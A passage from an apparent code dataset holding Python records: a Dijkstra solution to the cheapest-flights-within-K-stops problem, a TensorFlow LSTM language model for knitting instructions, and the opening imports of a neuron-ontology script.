"line_number": 301, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 303, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 307, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 308, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 309, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 310, "usage_type": "call"}, {"api_name": "dash_html_components.H5", "line_number": 312, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 314, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 318, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 319, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", 
"line_number": 326, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 327, "usage_type": "call"}, {"api_name": "dash_html_components.Button", "line_number": 329, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 351, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 353, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 354, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 356, "usage_type": "call"}, {"api_name": "dash_html_components.H4", "line_number": 358, "usage_type": "call"}, {"api_name": "dash_html_components.H6", "line_number": 359, "usage_type": "call"}, {"api_name": "dash_table.DataTable", "line_number": 363, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 388, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 389, "usage_type": "call"}, {"api_name": "dash_html_components.H4", "line_number": 391, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 393, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 395, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Modal", "line_number": 402, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.ModalHeader", "line_number": 404, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.ModalBody", "line_number": 405, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.ModalFooter", "line_number": 406, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 407, "usage_type": "call"}, {"api_name": "pandas.isnull", "line_number": 426, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 420, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 421, "usage_type": "call"}, {"api_name": "pandas.isnull", "line_number": 441, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 435, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 436, "usage_type": "call"}, {"api_name": "pandas.isnull", "line_number": 458, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 474, "usage_type": "call"}, {"api_name": "dash_html_components.Th", "line_number": 475, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 480, "usage_type": "call"}, {"api_name": "dash_html_components.Td", "line_number": 481, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 501, "usage_type": "call"}, {"api_name": "dash_html_components.Th", "line_number": 502, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 507, "usage_type": "call"}, {"api_name": "dash_html_components.Td", "line_number": 508, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 450, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 451, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 452, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 453, "usage_type": "call"}, {"api_name": "pandas.isnull", "line_number": 550, "usage_type": "call"}, {"api_name": "pandas.isnull", "line_number": 552, "usage_type": "call"}, {"api_name": "pandas.isnull", "line_number": 590, "usage_type": "call"}, {"api_name": "pandas.melt", "line_number": 653, "usage_type": "call"}, 
{"api_name": "pandas.DataFrame", "line_number": 653, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 656, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 656, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 516, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 517, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 518, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 519, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 520, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 522, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 523, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 524, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 525, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 526, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 527, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 528, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 529, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 530, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 531, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 532, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 533, "usage_type": "call"}]} +{"seq_id": "423178726", "text": "# Time: O((|E| + |V|) * log|V|) = O(|E| * log|V|),\n# if we can further to use Fibonacci heap, it would be O(|E| + |V| * log|V|)\n# Space: O(|E| + |V|) = O(|E|)\n\n# 787\n# There are n cities connected by m flights. 
Each flight starts from city u and arrives at v with a price w.\n#\n# Now given all the cities and flights, together with the starting city src and the destination dst,\n# your task is to find the cheapest price from src to dst with up to k stops.\n# If there is no such route, output -1.\n#\n# Example 1:\n# Input:\n# n = 3, edges = [[0,1,100],[1,2,100],[0,2,500]]\n# src = 0, dst = 2, k = 1\n# Output: 200\n# Explanation:\n# The cheapest price from city 0 to city 2 with at most 1 stop costs 200, as marked red in the picture.\n#\n# Example 2:\n# Input:\n# n = 3, edges = [[0,1,100],[1,2,100],[0,2,500]]\n# src = 0, dst = 2, k = 0\n# Output: 500\n#\n# Explanation:\n# The cheapest price from city 0 to city 2 with at most 0 stops costs 500, as marked blue in the picture.\n# Note:\n# - The number of nodes n will be in range [1, 100], with nodes labeled from 0 to n - 1.\n# - The size of flights will be in range [0, n * (n - 1) / 2].\n# - The format of each flight will be (src, dst, price).\n# - The price of each flight will be in the range [1, 10000].\n# - k is in the range of [0, n - 1].\n# - There will not be any duplicated flights or self cycles.\n\nimport collections\nimport heapq\n\n\nclass Solution(object):\n # Dijkstra with dict\n def findCheapestPrice(self, n, flights, src, dst, K): # USE THIS\n graph = collections.defaultdict(dict)\n for u, v, w in flights:\n graph[u][v] = w\n\n best = {}\n heap = [[0, src, 0]] # cost, node, step\n while heap:\n cost, node, step = heapq.heappop(heap)\n if node == dst:\n return cost\n if (node, step) in best or step > K:\n continue\n best[node, step] = cost\n\n for nei, w in graph[node].items():\n if (nei, step + 1) not in best:\n heapq.heappush(heap, (cost + w, nei, step + 1))\n return -1\n\n # wrong: returns 9 for the 1st test case. 
Each state must be represented by (node, steps),\n # otherwise the lower-step path is missed.\n def findCheapestPrice_wrong(self, n, flights, src, dst, K):\n graph = [{} for _ in range(n)]\n for u, v, w in flights:\n graph[u][v] = w\n\n best, pq = set(), [(0, src, 0)]\n while pq:\n p, node, stops = heapq.heappop(pq)\n if node == dst:\n return p\n\n if node not in best and stops <= K:\n best.add(node)\n\n for nei, w in graph[node].items():\n if nei not in best:\n heapq.heappush(pq, (p + w, nei, stops + 1))\n return -1\n\n # Dijkstra with list\n def findCheapestPrice2(self, n, flights, src, dst, K):\n graph = [{} for _ in range(n)]\n for u, v, p in flights:\n graph[u][v] = p\n\n # K stops means we can move K+1 steps; store and update the best price for each step separately\n # no need to fill best[src][0] as 0 like stepless Dijkstra does, because we won't go back to overwrite step 0.\n best = [[float('inf')] * (K + 2) for _ in range(n)]\n minHeap = [(0, src, 0)] # (price, node-to-reach, step-needed)\n while minHeap:\n price, node, step = heapq.heappop(minHeap)\n if node == dst:\n return price\n if step > K or price > best[node][step]: # prune\n continue\n for nei, p in graph[node].items():\n if price + p < best[nei][step + 1]:\n heapq.heappush(minHeap, (price + p, nei, step + 1))\n best[nei][step + 1] = price + p\n\n return -1\n\n\n def findCheapestPrice_kamyu(self, n, flights, src, dst, K):\n \"\"\"\n :type n: int\n :type flights: List[List[int]]\n :type src: int\n :type dst: int\n :type K: int\n :rtype: int\n \"\"\"\n adj = collections.defaultdict(list)\n for u, v, w in flights:\n adj[u].append((v, w))\n best = collections.defaultdict(lambda: collections.defaultdict(lambda: float(\"inf\")))\n min_heap = [(0, src, K+1)]\n while min_heap:\n result, u, k = heapq.heappop(min_heap)\n if k < 0 or best[u][k] < result:\n continue\n if u == dst:\n return result\n for v, w in adj[u]:\n if result+w < best[v][k-1]:\n best[v][k-1] = result+w \n heapq.heappush(min_heap, (result+w, v, k-1))\n return -1\n\nprint(Solution().findCheapestPrice(5,\n [[0,1,5],[1,2,5],[0,3,2],[3,1,2],[1,4,1],[4,2,1]], 0, 2, 2)) # 7\nprint(Solution().findCheapestPrice(3, [[0,1,100],[1,2,100],[0,2,500],[1,0,600]], 0, 2, 1)) # 200\nprint(Solution().findCheapestPrice(3, [[0,1,100],[1,2,100],[0,2,500]], 0, 2, 0)) # 500", "sub_path": "Python/cheapest-flights-within-k-stops.py", "file_name": "cheapest-flights-within-k-stops.py", "file_ext": "py", "file_size_in_byte": 4993, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "collections.defaultdict", "line_number": 43, "usage_type": "call"}, {"api_name": "heapq.heappop", "line_number": 50, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 59, "usage_type": "call"}, {"api_name": "heapq.heappop", "line_number": 71, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 80, "usage_type": "call"}, {"api_name": "heapq.heappop", "line_number": 94, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 101, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 116, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 119, "usage_type": "call"}, {"api_name": "heapq.heappop", "line_number": 122, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 130, "usage_type": "call"}]} +{"seq_id": "553365020", "text": "#!/usr/bin/env python\n\"\"\"\nRepresentation of the knitting instructions language model.\n\"\"\"\n\nfrom 
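The buggy variant kept in the flights record shows why the search state must be (node, steps) rather than node alone. One way to sidestep the state question entirely is Bellman-Ford relaxed for exactly K+1 rounds against a frozen copy of the previous round, so no path grows by more than one edge per round. A sketch (not one of the record's methods):

def find_cheapest_price(n, flights, src, dst, K):
    INF = float("inf")
    dist = [INF] * n
    dist[src] = 0
    for _ in range(K + 1):      # at most K stops means at most K+1 edges
        prev = dist[:]          # relax only against last round's values
        for u, v, w in flights:
            if prev[u] + w < dist[v]:
                dist[v] = prev[u] + w
    return dist[dst] if dist[dst] < INF else -1

print(find_cheapest_price(3, [[0, 1, 100], [1, 2, 100], [0, 2, 500]], 0, 2, 1))  # 200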
utilities import create_path_if_doesnt_exist\nfrom lexicon import Lexicon\nimport os\nimport errno\nimport json\n\nimport tensorflow as tf\nimport logging\n\n\nclass Model(object):\n \"\"\"\n Base class for the knitting instructions language model.\n\n Parameters\n ----------\n folder : str\n Folder where to save the model.\n lexicon : Lexicon, optional\n A previously compiled lexicon to use.\n graph : tf.Graph, optional\n A previously created Tensorflow graph to use.\n \"\"\"\n def __init__(self, folder, lexicon=None, graph=None):\n self.folder = folder\n self.lexicon = lexicon\n self.graph = graph\n create_path_if_doesnt_exist(folder)\n\n self.features = None\n self.prediction_indices = None\n self.prediction_probabilities = None\n\n def initialize(self, session):\n \"\"\"\n Initialize a session for the model.\n\n Parameters\n ----------\n session : tf.Session\n The session to initialize.\n \"\"\"\n pass\n\n\nclass TrainingModel(Model):\n \"\"\"\n A trainable knitting instructions language model. Can be trained, but is heavy.\n\n Parameters\n ----------\n training_data : TrainingData\n The training data used to generate the model, if starting from scratch.\n \"\"\"\n def __init__(self, folder, lexicon=None, graph=None, training_data=None):\n super(TrainingModel, self).__init__(folder, lexicon, graph)\n self.training_data = training_data\n\n self.latest_checkpoint_path = None\n\n self.responses = None\n self.loss = None\n self.perplexity = None\n self.minimize = None\n self.step = None\n\n self.saver = None\n\n def load(self):\n \"\"\"\n Load the model either from the provided lexicon and graph, or from saved files (if they exist), or by compiling\n it from scratch using data.\n \"\"\"\n if not self.lexicon:\n try:\n logging.info(\"[Importing lexicon]\")\n with open(os.path.join(self.folder, \"lexicon.json\"), 'r') as lexicon_file:\n self.lexicon = Lexicon(json.load(lexicon_file))\n except IOError as exception:\n if exception.errno == errno.ENOENT:\n logging.info(\"[Compiling lexicon]\")\n self.lexicon = self.training_data.compile_lexicon()\n with open(os.path.join(self.folder, \"lexicon.json\"), 'w') as lexicon_file:\n json.dump(self.lexicon.tokens, lexicon_file)\n else:\n raise\n\n if not self.graph:\n self.latest_checkpoint_path = tf.train.latest_checkpoint(self.folder)\n if self.latest_checkpoint_path is not None:\n logging.info(\"[Importing graph]\")\n self.saver = tf.train.import_meta_graph(self.latest_checkpoint_path + '.meta')\n else:\n logging.info(\"[Building graph]\")\n self.build_default_graph()\n self.graph = tf.get_default_graph()\n\n self.features = self.graph.get_tensor_by_name(\"input/features:0\")\n self.prediction_indices = self.graph.get_tensor_by_name(\"output/prediction_indices:0\")\n self.prediction_probabilities = self.graph.get_tensor_by_name(\"output/prediction_probabilities:0\")\n self.responses = self.graph.get_tensor_by_name(\"output/responses:0\")\n self.loss = self.graph.get_tensor_by_name(\"output/loss:0\")\n self.perplexity = self.graph.get_tensor_by_name(\"output/perplexity:0\")\n self.minimize = self.graph.get_tensor_by_name(\"operations/minimize:0\")\n self.step = self.graph.get_tensor_by_name(\"step:0\")\n\n if not self.saver:\n self.saver = tf.train.Saver()\n\n def build_default_graph(self):\n \"\"\"\n Build a new Tensorflow graph and set it as the default.\n \"\"\"\n lexicon_size = len(self.lexicon.tokens)\n embedding_size = 200\n memory_size = 200\n\n lstm_cell = tf.nn.rnn_cell.LSTMCell(memory_size)\n\n tf.reset_default_graph()\n padding = 
tf.constant(self.lexicon.padding_index)\n with tf.name_scope('input'):\n features = tf.placeholder(tf.int32, shape=[None, None], name=\"features\")\n sequence_lengths = tf.reduce_sum(tf.to_int32(tf.not_equal(features, padding)), axis=1)\n\n with tf.device(\"/cpu:0\"):\n embedding = tf.get_variable(\"embedding\", shape=[lexicon_size, embedding_size],\n initializer=tf.contrib.layers.xavier_initializer(), dtype=tf.float32)\n embedded_features = tf.nn.embedding_lookup(embedding, features)\n\n with tf.name_scope('lstm') as scope:\n lstm_activations, _ = \\\n tf.nn.dynamic_rnn(lstm_cell, embedded_features, sequence_length=sequence_lengths, scope=scope,\n dtype=tf.float32)\n flattened_lstm_activations = tf.reshape(lstm_activations, [-1, memory_size])\n\n with tf.name_scope('output'):\n weights = tf.get_variable(\"weights\", shape=[memory_size, lexicon_size],\n initializer=tf.contrib.layers.xavier_initializer())\n bias = tf.get_variable(\"bias\", shape=[1, lexicon_size],\n initializer=tf.contrib.layers.xavier_initializer())\n flat_units = tf.matmul(flattened_lstm_activations, weights) + bias\n\n responses = tf.placeholder(tf.int32, shape=[None, None], name=\"responses\")\n flat_responses = tf.reshape(responses, [-1])\n flat_losses = tf.nn.sparse_softmax_cross_entropy_with_logits(flat_units, flat_responses)\n\n mask = tf.to_float(tf.not_equal(features, padding))\n flat_mask = tf.reshape(mask, [-1])\n\n masked_losses = tf.reshape(flat_losses * flat_mask, tf.shape(features))\n loss = tf.reduce_mean(tf.reduce_sum(masked_losses, 1) / tf.to_float(sequence_lengths), name=\"loss\")\n perplexity = tf.exp(loss, name=\"perplexity\")\n\n units = tf.reshape(flat_units, tf.concat(0, [tf.shape(features), [lexicon_size]]))\n final_units = self.end_of_sequences(units, sequence_lengths)\n\n prediction_indices = tf.tile(tf.reshape(tf.range(lexicon_size), [1, -1]), [tf.shape(features)[0], 1],\n name=\"prediction_indices\")\n prediction_probabilities = tf.nn.softmax(final_units, name=\"prediction_probabilities\")\n\n with tf.name_scope(\"operations\"):\n step = tf.get_variable(\"step\", shape=[], initializer=tf.constant_initializer(0), trainable=False)\n minimize = tf.train.AdamOptimizer().minimize(loss, global_step=step, name=\"minimize\")\n\n @staticmethod\n def end_of_sequences(tensor, sequence_lengths):\n \"\"\"\n Utility function to select the end of sequences in a batch padded sequence tensor.\n\n Parameters\n ----------\n tensor : tf.Tensor\n The batch padded sequence tensor.\n sequence_lengths : tf.Tensor\n The lengths of every sentence in the batch.\n\n Returns\n -------\n The tensors at the end of the sequence, i.e.\n [tensor[0, sequence_lengths[0], :], ..., tensor[-1, sequence_lengths[-1], :]]\n \"\"\"\n sequences_range = tf.reshape(tf.range(0, tf.shape(tensor)[0], dtype=tf.int32), shape=[-1, 1])\n sequence_lengths = tf.reshape(sequence_lengths, shape=[-1, 1])\n indices = tf.concat(1, [sequences_range, sequence_lengths - 1])\n ends_of_sequences = tf.gather_nd(tensor, indices)\n return ends_of_sequences\n\n def initialize(self, session):\n if self.latest_checkpoint_path:\n logging.info(\"[Restoring previous checkpoint]\")\n self.saver.restore(session, self.latest_checkpoint_path)\n else:\n logging.info(\"[Initializing session]\")\n session.run(tf.global_variables_initializer())\n\n def save(self, session):\n \"\"\"\n Save a snapshot of the model in a session.\n\n Parameters\n ----------\n session : tf.Session\n The session that provides the snapshot.\n \"\"\"\n logging.info(\"[Saving checkpoint]\")\n with 
open(os.path.join(self.folder, \"lexicon.json\"), 'w') as lexicon_file:\n json.dump(self.lexicon.tokens, lexicon_file)\n self.saver.save(session, os.path.join(self.folder, 'generator'))\n\n def export_for_production(self, folder, session):\n \"\"\"\n Turn the model into a production model, by freezing variables into constants and removing training nodes.\n\n Parameters\n ----------\n folder : str\n The folder where to save the production model.\n session : tf.Session\n The session from which to fetch the variable values.\n\n Returns\n -------\n ProductionModel\n The production-ready model.\n \"\"\"\n logging.info(\"[Exporting final model]\")\n frozen_graph_def = tf.python.graph_util.convert_variables_to_constants(\n sess=session, input_graph_def=self.graph.as_graph_def(),\n output_node_names=[\"output/prediction_indices\", \"output/prediction_probabilities\"])\n tf.reset_default_graph()\n tf.import_graph_def(frozen_graph_def, name='')\n return ProductionModel(folder, lexicon=self.lexicon, graph=tf.get_default_graph())\n\n\nclass ProductionModel(Model):\n \"\"\"\n A production-ready knitting instructions language model. Cannot be trained further, but is light.\n \"\"\"\n def __init__(self, folder, lexicon=None, graph=None):\n super(ProductionModel, self).__init__(folder, lexicon, graph)\n\n def load(self):\n \"\"\"\n Load the model either from the provided lexicon and graph, or from saved files (if they exist).\n \"\"\"\n if not self.lexicon:\n try:\n logging.info(\"[Loading lexicon]\")\n with open(os.path.join(self.folder, \"lexicon.json\"), 'r') as lexicon_file:\n self.lexicon = Lexicon(json.load(lexicon_file))\n except IOError as exception:\n if exception.errno == errno.ENOENT:\n raise IOError(\"Cannot find the lexicon file. A production model cannot generate its lexicon.\")\n else:\n raise\n\n if not self.graph:\n logging.info(\"[Loading graph]\")\n with tf.gfile.GFile(os.path.join(self.folder, \"graph.pb\"), \"rb\") as graph_file:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(graph_file.read())\n tf.import_graph_def(graph_def, name=\"\")\n self.graph = tf.get_default_graph()\n\n self.features = self.graph.get_tensor_by_name(\"input/features:0\")\n self.prediction_indices = self.graph.get_tensor_by_name(\"output/prediction_indices:0\")\n self.prediction_probabilities = self.graph.get_tensor_by_name(\"output/prediction_probabilities:0\")\n\n def save(self):\n \"\"\"\n Save the model to the folder.\n \"\"\"\n logging.info(\"[Saving model]\")\n with open(os.path.join(self.folder, \"lexicon.json\"), 'w') as lexicon_file:\n json.dump(self.lexicon.tokens, lexicon_file)\n with tf.gfile.GFile(os.path.join(self.folder, 'graph.pb'), \"wb\") as file_handle:\n file_handle.write(self.graph.as_graph_def().SerializeToString())\n", "sub_path": "generator/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 11590, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "utilities.create_path_if_doesnt_exist", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "lexicon.Lexicon", "line_number": 83, "usage_type": "call"}, {"api_name": "json.load", "line_number": 83, "usage_type": "call"}, {"api_name": "errno.ENOENT", "line_number": 85, "usage_type": "attribute"}, {"api_name": "logging.info", 
"line_number": 86, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.train.latest_checkpoint", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 94, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 96, "usage_type": "call"}, {"api_name": "tensorflow.train.import_meta_graph", "line_number": 97, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 97, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 99, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 101, "usage_type": "call"}, {"api_name": "tensorflow.train.Saver", "line_number": 113, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 113, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.rnn_cell.LSTMCell", "line_number": 123, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 123, "usage_type": "attribute"}, {"api_name": "tensorflow.reset_default_graph", "line_number": 125, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 126, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 127, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 128, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 128, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_sum", "line_number": 129, "usage_type": "call"}, {"api_name": "tensorflow.to_int32", "line_number": 129, "usage_type": "call"}, {"api_name": "tensorflow.not_equal", "line_number": 129, "usage_type": "call"}, {"api_name": "tensorflow.device", "line_number": 131, "usage_type": "call"}, {"api_name": "tensorflow.get_variable", "line_number": 132, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.xavier_initializer", "line_number": 133, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 133, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 133, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.embedding_lookup", "line_number": 134, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 134, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 136, "usage_type": "call"}, {"api_name": "tensorflow.nn.dynamic_rnn", "line_number": 138, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 138, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 139, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 140, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 142, "usage_type": "call"}, {"api_name": "tensorflow.get_variable", "line_number": 143, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.xavier_initializer", "line_number": 144, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 144, "usage_type": "attribute"}, {"api_name": "tensorflow.get_variable", "line_number": 145, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.xavier_initializer", "line_number": 146, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 146, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 147, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", 
"line_number": 149, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 149, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 150, "usage_type": "call"}, {"api_name": "tensorflow.nn.sparse_softmax_cross_entropy_with_logits", "line_number": 151, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 151, "usage_type": "attribute"}, {"api_name": "tensorflow.to_float", "line_number": 153, "usage_type": "call"}, {"api_name": "tensorflow.not_equal", "line_number": 153, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 154, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 156, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 156, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 157, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 157, "usage_type": "call"}, {"api_name": "tensorflow.to_float", "line_number": 157, "usage_type": "call"}, {"api_name": "tensorflow.exp", "line_number": 158, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 160, "usage_type": "call"}, {"api_name": "tensorflow.concat", "line_number": 160, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 160, "usage_type": "call"}, {"api_name": "tensorflow.tile", "line_number": 163, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 163, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 163, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 163, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax", "line_number": 165, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 165, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 167, "usage_type": "call"}, {"api_name": "tensorflow.get_variable", "line_number": 168, "usage_type": "call"}, {"api_name": "tensorflow.constant_initializer", "line_number": 168, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 169, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 169, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 188, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 188, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 188, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 188, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 189, "usage_type": "call"}, {"api_name": "tensorflow.concat", "line_number": 190, "usage_type": "call"}, {"api_name": "tensorflow.gather_nd", "line_number": 191, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 196, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 199, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 200, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 211, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 212, "usage_type": "call"}, {"api_name": "os.path", "line_number": 212, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 213, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 214, "usage_type": "call"}, {"api_name": "os.path", "line_number": 214, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 232, "usage_type": "call"}, {"api_name": 
"tensorflow.python.graph_util.convert_variables_to_constants", "line_number": 233, "usage_type": "call"}, {"api_name": "tensorflow.python", "line_number": 233, "usage_type": "attribute"}, {"api_name": "tensorflow.reset_default_graph", "line_number": 236, "usage_type": "call"}, {"api_name": "tensorflow.import_graph_def", "line_number": 237, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 238, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 254, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 255, "usage_type": "call"}, {"api_name": "os.path", "line_number": 255, "usage_type": "attribute"}, {"api_name": "lexicon.Lexicon", "line_number": 256, "usage_type": "call"}, {"api_name": "json.load", "line_number": 256, "usage_type": "call"}, {"api_name": "errno.ENOENT", "line_number": 258, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 264, "usage_type": "call"}, {"api_name": "tensorflow.gfile.GFile", "line_number": 265, "usage_type": "call"}, {"api_name": "tensorflow.gfile", "line_number": 265, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 265, "usage_type": "call"}, {"api_name": "os.path", "line_number": 265, "usage_type": "attribute"}, {"api_name": "tensorflow.GraphDef", "line_number": 266, "usage_type": "call"}, {"api_name": "tensorflow.import_graph_def", "line_number": 268, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 269, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 279, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 280, "usage_type": "call"}, {"api_name": "os.path", "line_number": 280, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 281, "usage_type": "call"}, {"api_name": "tensorflow.gfile.GFile", "line_number": 282, "usage_type": "call"}, {"api_name": "tensorflow.gfile", "line_number": 282, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 282, "usage_type": "call"}, {"api_name": "os.path", "line_number": 282, "usage_type": "attribute"}]} +{"seq_id": "16919437", "text": "import rdflib # FIXME decouple\nimport ontquery as oq\nfrom hyputils.hypothesis import idFromShareLink, shareLinkFromId\nfrom pyontutils.sheets import update_sheet_values, get_note, Sheet\nfrom pyontutils.scigraph import Vocabulary\nfrom pyontutils.namespaces import ilxtr, TEMP, definition\nfrom pyontutils.closed_namespaces import rdfs, rdf\nfrom neurondm import NeuronCUT, Config, Phenotype, LogicalPhenotype\nfrom neurondm.models.cuts import make_cut_id, fixname\nfrom neurondm.core import log, OntId, OntTerm\n\n\ndef normalizeDoi(doi):\n if 'http' in 